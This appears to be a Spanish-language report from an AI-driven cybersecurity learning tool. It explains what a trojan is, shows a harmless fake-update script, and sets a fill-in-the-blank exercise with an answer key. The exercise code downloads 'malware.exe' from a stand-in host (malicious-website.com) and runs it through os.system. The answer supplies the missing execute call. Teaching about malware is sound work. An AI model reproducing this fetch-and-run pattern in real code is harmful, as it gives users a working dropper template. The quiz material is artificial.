## Reporte Generador de Escenarios de Aprendizaje

Nombre de Usuario: usuario
Consulta: troyano
Respuesta de la IA:
Hola, soy un experto en hackatones. Estoy aquí para ayudarte con tus preguntas sobre malware, programación y ciberseguridad.
Definición y descripción: Un troyano es un tipo de malware que se presenta como un software legítimo para engañar a los usuarios y hacer que lo instalen. Una vez instalado, puede permitir a un atacante acceder a la computadora de la víctima, robar información o realizar acciones maliciosas sin el conocimiento del usuario.
Cómo te pueden infectar: Un ejemplo de cómo un troyano puede llegar a infectarte es a través de la descarga de archivos infectados, como un supuesto activador gratuito para Microsoft Office en una web de descargas. Al descargar y ejecutar el archivo malicioso, se puede comprometer tu sistema.
Código de ejemplo:
python import time
<pre>print("Actualizando el sistema")</pre>
<pre>for i in range(101):     time.sleep(0.1)     print(f"[{i}%] Completado")</pre>
print("Actualización finalizada.")
Ahora, por favor, inserta tu nombre: y tu nota:
Actividad: Completa el siguiente código de un troyano simulado:
python import os

import requests

```
def download_malware():
    url = "http://malicious-website.com/malware.exe"
    response = requests.get(url)
    with open("malware.exe", "wb") as file:
        file.write(response.content)

def execute_malware():
    os.system("malware.exe")

# Completa la función principal
def main():
    download_malware()
    # Aquí debes llamar a la función para ejecutar el malware
    ______

if __name__ == "__main__":
    main()

Respuestas de la actividad:
La línea que debes completar es: `execute_malware()`
```

## Reporte del Usuario:

guugj